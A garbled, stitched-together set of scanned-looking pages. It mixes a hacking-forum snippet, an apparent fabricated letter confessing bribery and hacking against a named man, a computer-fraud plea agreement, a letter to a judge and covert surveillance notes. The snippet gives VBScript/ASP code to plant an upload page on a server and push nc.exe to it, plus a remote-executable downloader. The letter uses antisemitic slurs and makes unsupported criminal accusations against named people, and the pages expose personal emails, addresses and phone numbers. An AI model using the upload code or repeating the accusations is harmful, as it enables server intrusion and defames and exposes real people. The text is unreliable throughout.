379)     X      IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

we would like to schedule a half-hour follow-up appointment with Dr. Katz
at the Integrative Medicine Center as soon as possible.  Are there possibly
any open dates in the next couple of weeks?

Thanks!

Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX262lnkbGOTOMem/dwnload473Kb/s:Phone  server  co-source  Digital
Messaging  System  KX262lnkcGOTOMem/dwnload473Kb/s:Phone  server  co-
source Digital Messaging System ExtractpdfscanrecenterKX262lnkdST

E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b

GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing , but u can echo anytext u
want   including   signs   and   all;GOTOP65294    @echo    ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end    with%^>    >up.asp

```
in          your          client,save          as          up.vbs:

with                                                       wscript
if              .arguments.count<3           then            .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                          with
with                         createobject("adodb.stream")
.type=1:.open:.loadfromfile                        fn:s=.read:.close
end                                                          with
with                         createobject("microsoft.xmlhttp")
.open              "post",url,false:.send                        s
wscript.echo                                         .statustext
end                                                          with

do                                                            it:
```

3791426

2073984700

DC  PL Document ID (AC-3)

August 1991 / 070%6:
Medical Records Release Authorization
:195    X    (NR)
:195    X    (JC)
:159    X    (JC)
:290    X    (JC)
)?01    X    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

```
cscript    up.vbs    http://123.45.67.89/up.asp    nc.exe    mm.exe

2.
start                           its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default User\Local Settings\Temporary
Internet                                          Files\Content.IE5"
dir                     /s                         ps[1].exe
copy         XX000XXX\ps[1].exe                    c:\path\ps.exe
del                                                XX000XXX\ps[1].exe

3.
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo '     set       aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")           >>            dl.vbs
@echo web.open "get",arguments(0),0:web.send:if web.status^>200 then
.echo          "Error:"+web.status:.quit          >>           dl.vbs
@echo   aso.type=1:aso.open:aso.write  web.responsebody:aso.savetofile
.arguments(1),2:end        with           >>                   dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe E-
9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b

about all ways to upload files to cmd shell , since i started with
tftp and net share , then i increased my knowledge to the ftp method ,
then i made that vbs thing , and i knew after that the mshta thing ,
and i did other way with echoing , but its still beta thing (has some
problems , but u can echo anytext u want including signs and
all;GOTOP65294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital
```

3791427

2073984700

DC FL Document 10 (XC-2)

Ampant 1981 / 07896.
Medical Records Release Authorization
:115    A    (NMI
:113    A    (JC)
:115    A    (JC)
:201    A    (JC)
:201    A    (JC)

### CHRON (REVIEW 4 OF 4)
Password required to print. . . . . . . . . . . . .

infected with a virusL6 and goes everywhere now. By the way, Tom
Waigand was right about that "Stormtrooper Marches" album -- it's good,
and he sent me a copy of Hitler at Home, too. Even better. Tom's got a
problem with spreading himself too thin, though, and delegating his
input to others. Neil Clark and Householder ought to take my advice,
too. I have consistently refused to do the 501 thing, because there is
still a trail, in my opin, so our payments to Clark and HH have been
strictly cash with no account transfers. Waigand with WP was in front
of, or in, Orr's house dozens of times, so we sent both him and Macri
$15,000 for each trip if they got results. Waigand's jimmying the
transformer voltage test results was good on top of it, too. Macri
turned put to be another loose cannon in the end, though. At least he
used trac·fones and disposables like I told him. J. Shea probably does
not have the big picture from the dead Eginton, so we're probably OK
there, in reply to your inquiry about that. Too bad about Lenny
Marshall and his grandson - kept losing him a few years back after
working with Waigand, aka Harold at the Church of Christ
Wellsburg, and absentmindedness may get us in trouble. He's been losing
more than kids, and to hear him and his wife talk over and over about
losing a kid over and over sounds stupid. It is stupid. Lenny was
another mistake, but at least he went back to that meter after he
planted the stuff at Orr's, and he helped us get Orr for a few days.
But Jew attorney Winny Winick turned the tables, and there is a video
of Lenny repeatedly going up to that dam meter. Bad. Have to keep Orr
away from the dam JF, because if enough Jew-asses get involved, more
than one table might get overturned for us. So far we've kept the upper
hand in out little group, but a few of our clan have fallen by the
wayside. Tom and I had this IOT concept down pretty good, and were able
to track Orr lots of places. The letter to me at Eaton, though, hits
the Range Resources and West Penn/FirstEnergy nail on the head, though,
and that bothers me - there are multiple FirstEnergy firms we've dealt
with. On top of the Ohio-PA and related FE, there is that other (the
Texas) FE name-knockoff that has worked with Tom Waigand and me and
several others to hack in Jew-ass Orr's systems, and to get the info
for you and Anthony Alexander. Macri's phone losing fiasco had calls to
Alexander and others, and to be honest with you, it's a dam good thing
Macri is gone for good, if you know what I mean. Even so, neither Hamm
nor Orchowski nor the Fire Marshall will come out looking clean if
Alexander's sucky successor group exposes them, what with Chuck Jones
and all the FE money scarfed up by Householder. If it comes to light,
then Hamm goes down, Orchowski and the FM to boot. And any money to
them was maybe a mistake. You were right about Macri's "predilections,"
too -- and he kept on and on laughing and repeating all the dick
comments made by Neil Clark, even called Clark and propositioned him:
"If Clark boy is always talking about dicks, then maybe he and I can
get together and compare more than a few notes one day," said Macri.
Clark was pretty grossed out. After Chuck Jones took Alexander's job in
14/15, both Jones and Alexander gathered up all the File 43r letters -
many certified -- from Orr to FE, and showed them to Householder.  Back
in the day, Householder/HH had called me, and we put together plans for
getting the basement documents from 110 Woodridge. Took more than one
trip to get them, but at least we got bitch Orr's Honda good in the

3791435

2073984700

OC  FL Document ID (AC-7)

```
August 1993 / 07996-
Medical Records Release Authorization
:395    A    (NA)
:993    A    (JC)
:335    A    (JC)
:30:    A    (JC)
:*03    A    (JC)
```

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

process. Served her right. HH and Alexander paid Macri's men $240,000,
plus extra for Orr's IPhone and other info. Jones was especially scared
after that, though, when Shanin Specter later wrote to Leila Vespoli at
FE. Shanin nearly put West Penn into bankruptcy with the Goretzka case,
and he could do it again with Orr - even ban fracking and other O-G
ventures in three states - just like NY already. "Stop him," said
Jones, and so we did, by stomping Orr. We paid $205,000 to the PUC
attorney who wrote to Specter about Orr, and it was worth every penny
of it. What a letter. The five on the end of the number was Macri's
idea. Vespoli got more than twice as much, but with no five on the end.
We gave her $460,000. Not bad for Lady Bigwig's retirement. Macri's
joint work with ADT has helped a lot, but it hurt, too, like when he
got involved with Telesforo Aviles to get Orr's place wired with extra
surveillance cameras, in and out, and all with remote control and
access. Macri and Aviles saw Orr's every move, sometimes even in bed.
Remember how we dovetailed this with Range Resources? Well, their share
from us amounted to over $370,000 twice over, with much of that to the
Range Manager who spoke with both Jew Orr and Darlene on the phone.
Halliburton's fellow in Canonsburg, and the Rice boys, plus the firms
that came out to dig in Orr's yard again after he reported them - each
got nearly as much combined - between six and seven hundred thousand a
piece - from our MSO. The Halliburton guy is the same one from
Deepwater or whatever the hell it was, and he was drunk when we gave it
to him. And with the cash in the Rice boys' dad's account, they laughed
- "where's the beef" - and insisted on an extra kicker. The second
million-d payment we made. The first that I remember went to the 801
Cherry Street/Fort Worth div of First Energy Services Company (just
like Akron's name, and it's pretty dam amazing that there's a third and
fourth firm out there somewhere else too with the same fn name). You
asked about GLE: Great Lakes Energy was the name of the JV between
Range Resources and West Penn/FE, and drilled the first frack well or
something like that, so all this stuff keeps recycling back to RR and
friends. The C'burg's Halliburton boy's daughter got married, I think,
and Macri offended the drunk daddy with some sort of comment about the
groom looking like "a man's man," and then Macri laughed his laugh, so
there was bad blood for a while. Macri's Montagu contact at the
Millmont Foundation in Alison Park asked for another $60,000 for the
info they had on Orr, and it was definitely worth it, although they
didn't have nearly as much to offer as Macri had hoped for. Some of
their info came from Munich and the Richard Montagu recruiter; had
footage from the Bayerischer Hof hotel, the restaurant, too. Other
items, not Montagu, came from Wesel, Vienna, Wallingford, and several
other, also the Midland H.I. and Collinson. At least before Macri bit
the dust, he got the Apple ID and password sets, even played havoc with
mix and match here and there, which Apple got confused about more than
once. After getting the Apple sets, M transferred a whole bunch, got
all texts and links, Orrs and others, but with Orr went further and got
cross-KR96-type stuff plus a couple of extra goodies for fun like the
Second SC String Band. You were right about the band, Dave. Not bad, if
you watch where you play it. That's about all for now. Call me. HG.
Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone   server   co-source   Digital

2073984700

OC  PL Document 10 (XC-3)

s.quit 1981 / 03896s
Medical Records Release Authorization
;195      x    (NM)
;197      x    (JC)
;119      x    (JC)
;10;      x    (JC)
;793)     x    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

process. Served her right. HH and Alexander paid Macri's men $240,000,
plus extra for Orr's IPhone and other info. Jones was especially scared
after that, though, when Shanin Specter later wrote to Leila Vespoli at
FE. Shanin nearly put West Penn into bankruptcy with the Goretzka case,
and he could do it again with Orr - even ban fracking and other O-G
ventures in three states - just like NY already. "Stop him," said
Jones, and so we did, by stomping Orr. We paid $205,000 to the PUC
attorney who wrote to Specter about Orr, and it was worth every penny
of it. What a letter. The five on the end of the number was Macri's
idea. Vespoli got more than twice as much, but with no five on the end.
We gave her $460,000. Not bad for Lady Bigwig's retirement. Macri's
joint work with ADT has helped a lot, but it hurt, too, like when he
got involved with Telesforo Aviles to get Orr's place wired with extra
surveillance cameras, in and out, and all with remote control and
access. Macri and Aviles saw Orr's every move, sometimes even in bed.
Remember how we dovetailed this with Range Resources? Well, their share
from us amounted to over $370,000 twice over, with much of that to the
Range Manager who spoke with both Jew Orr and Darlene on the phone.
Halliburton's fellow in Canonsburg, and the Rice boys, plus the firms
that came out to dig in Orr's yard again after he reported them - each
got nearly as much combined - between six and seven hundred thousand a
piece - from our MSO. The Halliburton guy is the same one from
Deepwater or whatever the hell it was, and he was drunk when we gave it
to him. And with the cash in the Rice boys' dad's account, they laughed
- "where's the beef" - and insisted on an extra kicker. The second
million-d payment we made. The first that I remember went to the 801
Cherry Street/Fort Worth div of First Energy Services Company (just
like Akron's name, and it's pretty dam amazing that there's a third and
fourth firm out there somewhere else too with the same fn name). You
asked about GLE: Great Lakes Energy was the name of the JV between
Range Resources and West Penn/FE, and drilled the first frack well or
something like that, so all this stuff keeps recycling back to RR and
friends. The C'burg's Halliburton boy's daughter got married, I think,
and Macri offended the drunk daddy with some sort of comment about the
groom looking like "a man's man," and then Macri laughed his laugh, so
there was bad blood for a while. Macri's Montagu contact at the
Millmont Foundation in Alison Park asked for another $60,000 for the
info they had on Orr, and it was definitely worth it, although they
didn't have nearly as much to share as Macri had hoped for. Some of
their info came from Munich and the Richard Montagu recruiter; had
footage from the Bayerischer Hof hotel, the restaurant, too. Other
items, not Montagu, came from Wesel, Vienna, Wallingford, and several
other, also the Midland H.I. and Collinson. At least before Macri bit
the dust, he got the Apple ID and password sets, even played havoc with
mix and match here and there, which Apple got confused about more than
once. After getting the Apple sets, M transferred a whole bunch, got
all texts and links, Orrs and others, but with Orr went further and got
cross-KR96-type stuff plus a couple of extra goodies for fun like the
Second SC String Band. You were right about the band, Dave. Not bad, if
you watch where you play it. That's about all for now. Call me. HG.
. Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital

2073984700

DC  FL Document ID (RC-1)

August 1981 / 07896+
Medical Records Release Authorization
1983    A    (KR)
1983    A    (JC)
1983    A    (JC)
1203    A    (JC)
1983    A    (JC)

CHRON (REVIEW 4 OF 4)
Password required to print: ............

reduction in the defendant's sentence (e.g., based on a change in sentencing guidelines or statutory law). The defendant, however, reserves the rights (a) to bring a direct appeal of (i) a sentence exceeding the statutory maximum punishment, or (ii) an arithmetic error at sentencing, (b) to challenge the voluntariness of the defendant's plea of guilty or this waiver, and (c) to bring a claim of ineffective assistance of counsel.

13.    **Representation of counsel:** The defendant has thoroughly reviewed all legal and factual aspects of this case with the defendant's attorney and is fully satisfied with that attorney's legal representation. The defendant has received from the defendant's attorney explanations satisfactory to the defendant concerning each paragraph of this plea agreement, each of the defendant's rights affected by this agreement, and the alternatives available to the defendant other than entering into this agreement. Because the defendant concedes that the defendant is guilty, and after conferring with the defendant's attorney, the defendant has concluded that it is in the defendant's best interest to enter into this plea agreement and all its terms, rather than to proceed to trial in this case.

14.    **Entirety of agreement:** This document is a complete statement of the parties' agreement and may not be modified unless the modification is in writing and signed by all parties. This agreement supersedes any and all other promises, representations, understandings, and agreements that are or were made between the parties at any time before the guilty plea is entered in court. No promises or representations have been made by the United States except as set forth in writing in this plea agreement.

Plea Agreement—Page 6

2073984700

DC PL Document 10 (AC-3)

^PHOTO / 1381 31xx34
Vertical Records Release Authorization
1855    X    (NN)
1853    X    (JC)
1855    X    (JC)
1855    X    (JC)
1855    X    (JC)
1855    X    (JC)

CHRON (REVIEW 4 OF 4)

Password required to print **********

The Honorable John R. Adams
Page 1 of 9

Edward W. Orr
122 Ridge Road
Terryville, CT 06786

**VIA FEDEX**

August 8, 2022

The Honorable John R. Adams
2 South Main Street, Suite 510
Akron, Ohio 44308

Re: Miller v. Anderson, et al., Case No. 20-CV-1743 (N.D. Ohio)

Your Honor:

As a concerned citizen – and as direct participant in many aspects of this case (both the FBI and the Department of Justice contacted me regarding a FirstEnergy-related backer who victimized my family because we had vitally important information regarding FirstEnergy's illicit activities) – I have very grave concerns about the Southern District's being involved.

The undersigned and his family received repeated threats of:

(1) Physical harm, and

(2) Interference with the mail in regard to any possible Objection sent to the Court in the Southern District

I am very concerned about the possibility that a Final Approval "down South", so to speak," might essentially result in "a forced dismissal up North".

There is, indeed, "public interest here...because this is a public corruption case", as the Northern District has stated.

Not only were my family and I direct victims of FirstEnergy's illicit activities, but we were also sent a defective "Notice" (mis)informing us that we were Members of the

2073984700
DC PL Document 10 (AC-3)

CHRON (REVIEW 4 OF 4)
Password required to print: ***********

Class, at which time we spent in excess of $3,720 (three thousand seven hundred twenty dollars) in order to Object to what was going on in the Southern District of Ohio.

Is it not the existence and promulgation of defective Notice[1] more than enough reason to express serious doubt as to whether or not acceptable protocol has been followed in the Southern District?

Not to mention – in regard to the issue of "acceptable protocol" – problems such as incomplete written discovery; no testimony under oath from any Defendant or any other witness; and the whole litany of problems that the Northern District pointed out.

How can a Court that allows a defective Notice to be promulgated, be characterized as exercising proper supervision over the proceedings?

Why are there two sets of proceedings going on, anyway?

It is not fair. Nor does it make any sense.

The very same question can be asked about why there were two sets of Class Notices.

The verbiage in one of the Class Notices was inappropriate in the context of derivative litigation, yet it was still promulgated.[2]

This is not fair either. Nor does it make any sense.

How can the Court allow such things to go on?

What has happened to the Court's role as a referee? How can things and up so sloppily and haphazardly thrown together that simple tasks such as proofreading (and/or supervising the process of promulgating the Class Notice) are neglected?

[1] The defect in the Notice was discovered only after submission of the aforementioned Objection.

[2] Paragraph 111 of the Notice sent to the undersigned defined the Class as follows: "All persons and entities who received services from FirstEnergy or who own shares of FirstEnergy Corp...."

2073984700

CHRON (REVIEW 4 OF 4)

The Honorable John R. Adams
Page 3 of 9

Furthermore, there comes an even more fundamental question: When proceedings are conducted in such a manner that seriously defective Notice is promulgated to Class Members (and/or to others characterized as Class Members), shouldn't the Court insist on Plaintiffs' counsel going back to the drawing board,[3] and re-noticing the Class in a proper manner?

Lots of things simply do not make sense in this case, and the public has a right to know about it.

The FBI and the Department of Justice have been involved for very good reason, so shouldn't someone who has received defective Notice be allowed to come forward and say, "Wait a minute, Judge, something doesn't seem to be right here."

"What happened to what I submitted to the Court in the Southern District after I received defective Class Notice?" (I submitted an 88-page Objection, along with 24 exhibits.)".

"What happened to it?"                              Focus Center

"Why is it *not* on the record?"

This is no minor point.                             Focus Center

Nor are any of the following points minor in nature:

1. Incomplete written discovery,[5]               Focus Center

---

[3] As mentioned previously, Paragraph 111 of the Notice sent to the undersigned defined the Class as follows: "All persons and entities who received services from FirstEnergy or who own shares of FirstEnergy Corp...." (Please note that a copy of said Class Notice was also included in one of the numerous exhibits accompanying the aforementioned Objection.)

[4] The parties in this case seem to have a real problem in regard to all types of notice, whether such notice be Class Notice and/or any other type. (This is obviously only one of the many problems that the Northern District has rightfully taken the liberty of pointing out.)

[5] As reported in the press, and as repeatedly emphasized by the Northern District.

2073984700

CHRON (REVIEW 4 OF 4)

The Honorable John R. Adams
Page 4 of 9

2. No testimony under oath from any Defendant or other witness.[6]

3. Incomplete privilege logs detailing withheld documentation.[7]

4. An incomplete forensic examination to identify possible missing communications contained on Defendant Charles Jones' personal electronic devices.[8]

5. An inadequate period to review and analyze the documents that were provided.[9]

6. The parties have failed to explain why the Court should abandon the first-to-file rule.[10]

7. The parties have given no indication that notice was provided of their proposed dismissal to shareholders, nor did they propose any method of providing such notice.[11]

---

[6] Ibid.

[7] Ibid.

[8] Ibid.

[9] Ibid.

[10] Ibid.

[11] Fed.R. Civ. P. 23.1(c) provides as follows: A derivative action may be settled, voluntarily dismissed, or compromised only with the court's approval. Notice of a proposed settlement, voluntary dismissal, or compromise must be given to shareholders or members in the manner that the court orders.

2073984700

DC  PL Document 10 (AC-3)

August 1991 / 87894.
Medical Records Release Authorization
:115    X    INKI
:111    X    IJCI
:111    X    IJCI
:101    A    IJCI
:101    A    IJCI

CHRON (REVIEW 4 OF 4)
Password required to print: ............

Focus Center

Focus Center

Focus Center

C-R 519
SIWINICK L
JEWISH FEDORATION V
E. OAR L
5 SPECTOR L

2073984700

DC FL Document ID (BC-2)

Request 1511 / 01696.
Medical Records Release Authorization
:199    A    (RR)
:199    A    LJC:
:139    A    LJC:
::0:    A    LJC:
::0:    A    LJC:

CHRON (REVIEW 4 OF 4)
Password required to print: ············

Case 0:20-cv-60971-AHS    Document 53-3    Entered on FLSD Docket 10/27/2020    Page 2 of 8
Case 3:20-cr-00506-X    Document 4    Filed 10/19/20    Page 1 of 7    PageID 6

# ORIGINAL

CLERK US DISTRICT COURT
NORTHERN DIST OF TX
FILED

2020 OCT 19    AM 11: 35

IN THE UNITED STATES DISTRICT COURT
FOR THE NORTHERN DISTRICT OF TEXAS
DALLAS DIVISION

DEPUTY CLERK

UNITED STATES OF AMERICA

v.

TELESFORO AVILES

NO.

**3-20CR0506-X**

## PLEA AGREEMENT

Telesforo Aviles, the defendant, Tom Pappas, the defendant's attorney, and the

United States of America (the government) agree as follows:

1.      **Rights of the defendant:** The defendant understands that the defendant
has the rights:

      a.      to plead not guilty;

      b.      to have a trial by jury;

      c.      to have the defendant's guilt proven beyond a reasonable doubt;

      d.      to confront and cross-examine witnesses and to call witnesses in the
defendant's defense; and

      e.      against compelled self-incrimination.

2.      **Waiver of rights and plea of guilty:** The defendant waives these rights

and pleads guilty to the offense alleged in Count One of the Information, charging a

violation of 18 U.S.C. § 1030(a)(2)(C) and (c)(2)(B)(ii), that is, Computer Fraud. The

defendant understands the nature and elements of the crime to which the defendant is

Plea Agreement—Page 1

2073984700

DC  FL Document 19  DC
(1-36) 01 Internal 19

PB3010 / 1991 / 07030:
Medical Records Release Authorization
:193      X      INNI
:193      X      13CI
:193      X      13CI
:?01      X      13CI
:?01      X      13CI

### CHRON (REVIEW 4 OF 4)
Password required to print: ***********

The Honorable John R. Adams
Page 5 of 9

Furthermore, given the fact that the undersigned and his family have received repeated threats of physical harm in regard to any possible Objection sent to the Court in the Southern District, doesn't the public have a right to know what has happened?

In other words, doesn't the public have a right to know just how extensive the state of FirstEnergy's corruption is?

The threats[17] were so bad that the post office advised the undersigned to send two copies[18] of the Objection to the Court in the Southern District – each copy via a separate delivery protocol, and one copy thereof to be transmitted completely outside of the range of the post office's computer system (as apparently the post office's system had been hacked[19].)

Accordingly, the undersigned and his family took the post office's advice and sent one copy via the post office, and one via FEDEX.

Prior to this, the undersigned and his family even had to move six hundred miles away from their prior residence (which was literally in FirstEnergy's backyard) because of

---

[17] Prior to this, the undersigned and his family even had to move six hundred miles away from their prior residence (which was literally in FirstEnergy's backyard) because of FirstEnergy affiliate Teleshro Avilez, hacking and other illegitimate activities (see also Avilez, colleagues Baratov, et al). FBI Agent Ryan Weydeck et contacted Orr and his family regarding Avilez et al.

[18] On July 19, 2022, the Court in the Southern District merely made a text entry about its receipt of the Objection via both modalities; nevertheless, it did not enter the actual Objection itself onto the record.

This is highly unusual, even given the fact that, later on, the Objection was officially "stricken."

Another Objector's Objection (that of John Donovan) was also stricken, yet virtually every page of his Objection still made it onto the record. Why, therefore, was Objector Orr's Objection treated differently?

[19] There have previously been multiple problems with even certified mail (sent by the undersigned) reaching its destination.

2073984700

DC PL Document ID (AC-3)

```
-.ocit 1781 / 03804-
Medical Records Release Authorization
:393      A      (RR)
:393      A      (JC)
:339      A      (JC)
:202      A      (JC)
:203      A      (JC)
```

## CHRON (REVIEW 4 OF 4)
Password required to print: .............

Case 0:20-cv-60971-AHS   Document 53-3   Entered on FLSD Docket 10/27/2020   Page 8 of 8
Case 3:20-cr-00506-X   Document 4   Filed 10/19/20   Page 7 of 7   PageID 12

AGREED TO AND SIGNED this 19 day of October _____, 2020 .

ERIN NEALY COX
UNITED STATES ATTORNEY

_____                    Focus Center

Sid P. Mody
Assistant United States Attorney
Texas State Bar No. 24072791
1100 Commerce St. Suite 300                  Focus Center
Dallas, Texas 75242
Tel: 214-659-8600
siddharth.mody@usdoj.gov

_____                    Focus Center

Errin Martin
Criminal Section Chief

I have read or had read to me this plea agreement and have carefully reviewed
every part of it with my attorney. I fully understand it and voluntarily agree to it.

X _____          _____10/16/20_____
Telesforo Aviles                     Date
Defendant

I am the defendant's attorney. I have carefully reviewed every part of this plea
agreement with the defendant. To my knowledge and belief, my client's decision to enter
into this plea agreement is an informed and voluntary one.

_____          _____6/16/20_____
Tom Pappas                         Date
Attorney for Defendant

Plea Agreement—Page 7

2073984700

DC  PL Document ID (RC-7)

Request 1382 / 07856-
Medical Records Release Authorization
:195     X      (RN)
:187     X      (JC)
:155     X      (JC)
:201     X      (JC)
:191     X      (JC)

## CHRON  (REVIEW  4  OF  4)

Password required to print ··············

OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:  DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:   DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

SETTOSCAN623452828sfcy836239
[message truncated] SETTO092369 GOTO09312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek

Secr. repo dictated, sig on fl, rec. signed copy, per ds.secretary
Reset363

E-9
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT  06437  RNGenSETTO989356 RNGenSETTO989356 RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek

per2982downld826 per2982downld826 per2982downld826 Porto will not agree
to continue additional contract audio surveillance of 145 Greystone per
cellular scanner, ctr said 800/900 MHz cellular telephone or any
cordless telephone allows both sides of the conversation per rew/013
Cellular   Telephone   Scanner/Model   AU   013/SR904762cache3aGOTO

3791421

2073984700

DC FL Document 10 (AC-2)

request 1991 / 07894:
Medical Records Release Authorization
2199    A    (NK)
1997    A    (JC)
1919    A    (JC)
1201    A    (JC)
1209    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ..........

Also per Telemonitor 3000 for audio on premises via regular telephone
lines, as long as ID system can be programmed to recognize listener as
the owner of the phone. Easy to reprogram call-in to recognize any
phone-in as the caller, so worked pretty well June-Aug2004 + Jan2005
and Aug 2005, till .92a dipswitch reroute. Will retain only CT video
for remainder of 2005 and Q1 2006. Porto said no wonder D.Orr unable
to exhaust administrative remedies, called supv again after hrs to
discuss truncation of surv. Reported Jun/Jul 2004 typical day as f1/no
F/U:a. D.Orr morning wk-up: 3:30 - 3:45 AM/work 6 days regularly,
sometimes all 7
b. After her own brfst, makeup, dress, and wash face 3:45-4:00, then
prep. food + area for husband 4:00 - 4:45 AM
c. Cleansing of feces-soiled clothing of husband, also cleansing of
other special areas, including vomitus from moving husband.
d. Often 8-9 times helping husband with movement when unable to
(before waking up at 3:30 AM)
e. Household chores, manmy related to husband's handicaps, after 4:45
AM
f. Leave house from 5:30 AM to 6:00, sometimes before because of work
schedule doubling, and related.
g. Travel to Simsbury, approx. 31 mi from Southington, about 40 min.
of travel in morning if no traffic pile-up/jam
h. Start work from 6:30 or so, go till 5:00 till 6:00 PM, depending on
demands
i. Travel home, shop at Firzgerald's before on road, then shopping
often on way home, Walmart and related, generally for husband's spec.
needs/ C.R. Dr. Guerrera, et al.
j. Arrive home often 7:30 PM
k. Spec. prep. for husband for meals
l. Evening meal approx 8:00 PM or close to.
m. Help husband with bath, except often takes two-three nights for
full bath, since husband's body cannot take stress of full bath in one
day / 9:00 - 10:30
n. Clean bathtub, and related / 11:00
o. Household chores / of daily variety, not including weekly tasks of
lawn, outside (snow removal if other months of year, etc.) 11:00 -12:00
SETTOSCAN623452828sfcy836239
[message truncated] SETTO92369 GOTO9312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek
p. Recurrent monthly bills and paperwork, not including insurance
generally / 12:00 - 12:45+
q. Own bath/shower: 12:45 - 1:00+
r. Retire to sleep 1:15+
Generally repetitive schedule, and if day off once every two weeks
approx., then errands such as car repairs and other necessaries gen.
consume entire day, nght, with same schedule 3:30AM wakeup, and bed

2073984700

OC PL Document ID (AC-3)

August 1981 / 07896.
Medical Records Release Authorization
1993    6    (NN)
1193    A    (JC)
1339    A    (JC)
3292    A    (JC)
1792    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

after midnight. Audio espec picked up on extra hours req. for insurance
matters, inclusive of letter to Tucker, answering questions, moving
document items, etc. May have hurt herself in moving the boxes.
Repeated surveillance dozens of times since, with recents about 1-7-
2020.
Hao Gu 10-7-15: HG (to TA) Where are you now, Telesforo? Did you get
the prev mess? I have asked Alfred to fix the fl/ln-Eliseo and fl/ln-
page-number repeat issues, too. Pronto. Telesforo, your surveillance on
Amanda Phillips via ADT and Rodan or whatever she's affil with must
stop. Pronto. But all the Facebook/Apple server skimming - via URL
masking and erasing and all those other tricks from Alfred - that you
did on Orr's Facebook account and his Firstenergy contacts and so forth
for years,.from 2010 to today, was real good. It paid off big time. Via
ADT it linked us to the files Orr has on Thomas Macri, so continue
those activities as we discussed at Hamm's restaurant in the Nobelstown
area. Then go ahead and check out taylor Madison. The third-party
servers skimmed the meds and financials on Orr pretty good at least
twice, too, so proceed to next step before Barlow gets back to us if
you can. Either encrypt 2-layer, or use 2-3 proxy addresses/links.
END42
TA (TO HG): OK.
LINK76 HG5523425-cnt-
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT 06437 RNGenSETTO989356 RNGenSETTO989356 RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek

WP sequestered/Nodoctor-patient relationship exists or is implied by
this report, and no treatment was given or suggested by the
rev/examiner(s).

E-Gold and/or rel. if required,as RJP wishes separation from other
accounts. Porto wants mor RNGenSETTO989356 RNGenSETTO989356
RNGenSETTO989356 RNGenSETTO989829034ae, and re-mentioned the
groundbreaking NYT article on Dow Chem corp veil with Corning
/completely non-existent veil /counsel lost nerve on
OrrGOTO23926emailcrawler823SETOPortoDC24b pretty quick, excess of
$2+/3+ billion liability, maybe even $10+, could easily pull Dow
Chemical into Chap 11 right along with Corning if he testifies about
Sarnia lab notebooks to Nevada court, or to Pointer, et al, even could
re-surface in future since liability will go for decades on Dow
